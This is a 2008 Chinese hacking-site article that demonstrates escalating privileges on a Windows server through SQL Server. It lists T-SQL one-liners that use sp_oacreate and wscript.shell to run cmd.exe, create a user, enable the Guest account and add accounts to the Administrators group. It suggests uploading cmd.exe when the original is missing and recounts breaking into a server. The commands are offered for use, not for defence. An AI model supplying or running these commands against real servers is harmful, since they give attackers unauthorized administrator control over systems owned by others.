基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 安全动画 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 菜鸟宝典 >> 文章正文
SQL提权演示
作者:admin    文章来源:转载    点击数:    更新时间:2008-7-4

 

SQL提权演示

  首先想给大家了解一下SQL提权常用命令:
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'  --添加新用户。
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'  --把用户加到管理组

  如果以上添加管理员失败的时候,我们可以尝试激活Guest。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'  --激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'  --把Guest加到管理组

  注意:如果c:\windows\system32\cmd.exe 被删除,没权限访问或者拒绝访问的话,我们可以自己上传个CMD上去,然后路径修改我们上传的CMD路径就可以了。

 

下面给大家演示一下整个SQL提权的过程:

默认GUEST用户密码为空禁用状态!

 

激活GUEST用户

 

激活GUEST用户成功,但是没有权限,所以我们继续把GUEST这个用户添加到管理组!

 

把Guest加到管理组

 

成功把GUEST加到了管理组,成功进入了服务器!

 

进去后能做些什么?相信这个就不用我罗嗦了。


 

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:Wangtianxiang 
  • 下一篇文章: 没有了
  • 最近更新
    推荐文章SQL提权演示
    推荐文章SQL注射修改难猜解的M
    推荐文章靠网民输错域名 每天1
    推荐文章漫谈局域网中的限制与
    推荐文章木马万能查杀清除方法
    推荐文章全盘禁止运行指定程序
    推荐文章bat 批处理(命令 文件
    推荐文章记一次简单的渗透测试
    推荐文章自动限制电脑功能和某
    推荐文章分解网络入侵 Snifer确
    热门文章
    推荐文章利用社会工程学拿下五
    推荐文章QQ十大使用秘笈大公开
    推荐文章网管和黑客都必须知道
    推荐文章Tomcat弱口令到拿下服
    推荐文章帮你找回被盗的QQ,11个
    普通文章玩转网吧hack
    推荐文章3389密码的嗅探实例
    普通文章让你的QQ飞起来,卸了Q
    推荐文章菜鸟必看:小心,QQ就
    普通文章网管必知:电脑所有密码
    相关文章
    提高网站IP方法篇
    杀毒技巧总结-站长保护好
    逆向分析点滴
    SQL注射修改难猜解的MD5
    看高手教你如何用命令行
    IE 8测试版新增安全功能
    把脉问药 让硬盘摆脱五大
    大蜘蛛联手三大防火墙 打
    巧妙拦截QQ广告 防火墙也
    靠网民输错域名 每天15万
    杀毒也有分寸 巧妙设置杀
    菜鸟安检传世SF报告(转
    QQ防社会工程学解破
    新黑客程序在系统外运行
    利用ISA禁止登录QQ上网和
    珊瑚虫案再现:迅雷诉超
    漫谈局域网中的限制与突
    屏蔽“鸡肋”网络功能 让
    Windows中建立VPN链接 实
    让kv系统漏洞检查帮你做
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘
    加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

    浙ICP备06031184号